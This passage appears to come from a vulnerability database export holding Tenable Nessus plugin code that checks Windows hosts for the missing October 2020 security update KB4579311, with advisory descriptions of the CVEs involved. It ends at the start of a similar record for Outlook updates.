\"CVE-2020-16911\",\n \"CVE-2020-16912\",\n \"CVE-2020-16913\",\n \"CVE-2020-16914\",\n \"CVE-2020-16915\",\n \"CVE-2020-16916\",\n \"CVE-2020-16919\",\n \"CVE-2020-16920\",\n \"CVE-2020-16921\",\n \"CVE-2020-16922\",\n \"CVE-2020-16923\",\n \"CVE-2020-16924\",\n \"CVE-2020-16927\",\n \"CVE-2020-16935\",\n \"CVE-2020-16936\",\n \"CVE-2020-16937\",\n \"CVE-2020-16938\",\n \"CVE-2020-16939\",\n \"CVE-2020-16940\",\n \"CVE-2020-16967\",\n \"CVE-2020-16968\",\n \"CVE-2020-16972\",\n \"CVE-2020-16973\",\n \"CVE-2020-16974\",\n \"CVE-2020-16975\",\n \"CVE-2020-16976\"\n );\n script_xref(name:\"MSKB\", value:\"4579311\");\n script_xref(name:\"MSFT\", value:\"MS20-4579311\");\n script_xref(name:\"IAVA\", value:\"2020-A-0457-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0458-S\");\n\n script_name(english:\"KB4579311: Windows 10 Version 2004 October 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4579311.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-16922)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-16895)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-16924)\n\n - An elevation of privilege vulnerability exists when the\n Windows Storage VSP Driver improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-16885)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1167, CVE-2020-16923)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-16891)\n\n - A remote code execution vulnerability exists when the\n Windows TCP/IP stack improperly handles ICMPv6 Router\n Advertisement packets. An attacker who successfully\n exploited this vulnerability could gain the ability to\n execute code on the target server or client.\n (CVE-2020-16898)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows kernel image handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-16892)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability.\n (CVE-2020-16914)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-16902)\n\n - An elevation of privilege vulnerability exists when the\n Windows Storage Services improperly handle file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-0764)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-16890)\n\n - An information disclosure vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-16896)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-16911)\n\n - An information disclosure vulnerability exists when\n NetBIOS over TCP (NBT) Extensions (NetBT) improperly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16897)\n\n - An elevation of privilege vulnerability exists when the\n Windows Application Compatibility Client Library\n improperly handles registry operations. An attacker who\n successfully exploited this vulnerability could gain\n elevated privileges. (CVE-2020-16876, CVE-2020-16920)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-16915)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles junction points. An attacker who successfully\n exploited this vulnerability could delete files and\n folders in an elevated context. (CVE-2020-16940)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows improperly handles reparse points. An\n attacker who successfully exploited this vulnerability\n could overwrite or delete a targeted file that would\n normally require elevated permissions. (CVE-2020-16877)\n\n - A security feature bypass vulnerability exists when\n Microsoft Windows fails to handle file creation\n permissions, which could allow an attacker to create\n files in a protected Unified Extensible Firmware\n Interface (UEFI) location. (CVE-2020-16910)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-16938)\n\n - A denial of service vulnerability exists when the\n Windows TCP/IP stack improperly handles ICMPv6 Router\n Advertisement packets. An attacker who successfully\n exploited this vulnerability could cause a target system\n to stop responding. (CVE-2020-16899)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-16939)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-16905, CVE-2020-16909)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n specific malicious data from a user on a guest operating\n system. (CVE-2020-1243)\n\n - An information disclosure vulnerability exists in Text\n Services Framework when it fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could potentially read data\n that was not intended to be disclosed. Note that this\n vulnerability would not allow an attacker to execute\n code or to elevate their user rights directly, but it\n could be used to obtain information that could be used\n to try to further compromise the affected system.\n (CVE-2020-16921)\n\n - A remote code execution vulnerability exists when the\n Windows Camera Codec Pack improperly handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-16967, CVE-2020-16968)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-16887)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2020-16927)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-16912, CVE-2020-16936,\n CVE-2020-16972, CVE-2020-16973, CVE-2020-16974,\n CVE-2020-16975, CVE-2020-16976)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-16907, CVE-2020-16913)\n\n - An information disclosure vulnerability exists when the\n .NET Framework improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could disclose contents of an affected system's memory.\n (CVE-2020-16937)\n\n - An information disclosure vulnerability exists when the\n Windows KernelStream improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-16889)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2020-16916, CVE-2020-16935)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event System improperly handles objects in\n memory. (CVE-2020-16900)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-1047,\n CVE-2020-1080)\n\n - An information disclosure vulnerability exists when the\n Windows Enterprise App Management Service improperly\n handles certain file operations. An attacker who\n successfully exploited this vulnerability could read\n arbitrary files. An attacker with unprivileged access to\n a vulnerable system could exploit this vulnerability.\n The security update addresses the vulnerability by\n ensuring the Windows Enterprise App Management Service\n properly handles file operations. (CVE-2020-16919)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4579311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4579311.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16968\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-16915\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-10\";\nkbs = make_list('4579311');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"10_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4579311])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T00:53:21", "description": "The Microsoft Outlook application installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16947)\n\n - A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could cause a remote denial of service against a system. Exploitation of the vulnerability requires that a specially crafted email be sent to a vulnerable Outlook server. The security update addresses the vulnerability by correcting how Microsoft Outlook handles objects in memory. (CVE-2020-16949)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Outlook (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16947", "CVE-2020-16949"], "modified": "2020-12-11T00:00:00", "cpe": ["cpe:/a:microsoft:outlook"], "id": "SMB_NT_MS20_OCT_OUTLOOK.NASL", "href": "https://www.tenable.com/plugins/nessus/141428", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_